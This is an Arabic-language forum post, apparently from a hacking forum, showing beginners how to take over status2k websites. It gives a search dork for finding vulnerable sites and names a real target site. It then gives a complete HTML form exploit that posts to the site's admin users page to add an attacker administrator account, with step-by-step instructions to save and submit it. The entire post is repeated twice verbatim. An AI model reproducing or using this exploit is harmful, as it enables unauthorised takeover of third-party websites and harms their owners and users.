virus3033
08-04-2010, 04:21 PM
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله و بركاته
ان شاء الله بخير
ثغره مصاب بها كثير من المواقع
للبحث allinurl:dynamicimg.php
الشرح مطبق على موقع سبق اختراقه
http://www.freewebtown.com/fri3/hacked.html
راح اقلكم كيف اخترقه حتى تدخل الى لوحة التحكم
الموقع مصاب بثغره
http://hitall.ir/statuse/dynamicimg.php
انسخ الكود التالي و اللصقه في المفكره بدون تعديل اي شي
<html>
<title>status2k Remote Add Admin</title>
<body link="#00FF00" text="#008000" bgcolor="#000000">
<form method="POST" action="http://hitall.ir/statuse/admin/options/users.php">
<input type="hidden" name="type" value="add">
<table border="1" cellpadding="4" style="border-collapse: collapse" width="100%" bordercolor="#808080">
<tr>
<td class="top">
<p align="center"><b>User & Pass : sec-war</b></p>
<p align="center"><b><font face="Comic Sans MS">
<a href="http://server/path//index.php?act=idx" style="text-decoration: none">
<font color="#00FF00">Security War</font></a></font></b></p>
<p align="center"><b>Username:</b></td>
</tr>
<tr>
<td height="1">
<p align="center"><input type="text" name="adminuser" size="30" value="sec-war"></td>
</tr>
<tr>
<td class="top">
<p align="center"><b>Password:</b></td>
</tr>
<tr>
<td height="22">
<p align="center">
<input type="password" name="adminpass" size="30" value="sec-war"></td>
</tr>
<tr>
<td align="right">
<p align="center">
<input type="submit" value="Add User >>" style="font-weight: 700"></td>
</tr>
</form>
</table>
</html>بعد ذلك
اختر ملف اعلى المفكره
ثم حفظ باسم اي اسم تفضل
xxx.html
افضل تنسخ الاسم يامبتدي حتى لاتنسى الصيغه او النقطه وتقول ماعندي سالفه ههههههه
بعد ما تحفط الاسم روح لسطح المكتب رح تجده امامك xxx.html
اضغط عليه و ادخل اليوز و الباس حقك
وكررها في الموقع راح تدخل على لوحة التحكم مباشره حتى لو انه مخترق
لاحظ التغيرات في الكود
من
http://hitall.ir/statuse/dynamicimg.php
الى
http://hitall.ir/statuse/admin/options/users.php
تم حذف
dynamicimg.php
رابط الثقره
http://www.exploit-db.com/exploits/11258/
بالتوفيق
السلام عليكم ورحمة الله و بركاته
ان شاء الله بخير
ثغره مصاب بها كثير من المواقع
للبحث allinurl:dynamicimg.php
الشرح مطبق على موقع سبق اختراقه
http://www.freewebtown.com/fri3/hacked.html
راح اقلكم كيف اخترقه حتى تدخل الى لوحة التحكم
الموقع مصاب بثغره
http://hitall.ir/statuse/dynamicimg.php
انسخ الكود التالي و اللصقه في المفكره بدون تعديل اي شي
<html>
<title>status2k Remote Add Admin</title>
<body link="#00FF00" text="#008000" bgcolor="#000000">
<form method="POST" action="http://hitall.ir/statuse/admin/options/users.php">
<input type="hidden" name="type" value="add">
<table border="1" cellpadding="4" style="border-collapse: collapse" width="100%" bordercolor="#808080">
<tr>
<td class="top">
<p align="center"><b>User & Pass : sec-war</b></p>
<p align="center"><b><font face="Comic Sans MS">
<a href="http://server/path//index.php?act=idx" style="text-decoration: none">
<font color="#00FF00">Security War</font></a></font></b></p>
<p align="center"><b>Username:</b></td>
</tr>
<tr>
<td height="1">
<p align="center"><input type="text" name="adminuser" size="30" value="sec-war"></td>
</tr>
<tr>
<td class="top">
<p align="center"><b>Password:</b></td>
</tr>
<tr>
<td height="22">
<p align="center">
<input type="password" name="adminpass" size="30" value="sec-war"></td>
</tr>
<tr>
<td align="right">
<p align="center">
<input type="submit" value="Add User >>" style="font-weight: 700"></td>
</tr>
</form>
</table>
</html>بعد ذلك
اختر ملف اعلى المفكره
ثم حفظ باسم اي اسم تفضل
xxx.html
افضل تنسخ الاسم يامبتدي حتى لاتنسى الصيغه او النقطه وتقول ماعندي سالفه ههههههه
بعد ما تحفط الاسم روح لسطح المكتب رح تجده امامك xxx.html
اضغط عليه و ادخل اليوز و الباس حقك
وكررها في الموقع راح تدخل على لوحة التحكم مباشره حتى لو انه مخترق
لاحظ التغيرات في الكود
من
http://hitall.ir/statuse/dynamicimg.php
الى
http://hitall.ir/statuse/admin/options/users.php
تم حذف
dynamicimg.php
رابط الثقره
http://www.exploit-db.com/exploits/11258/
بالتوفيق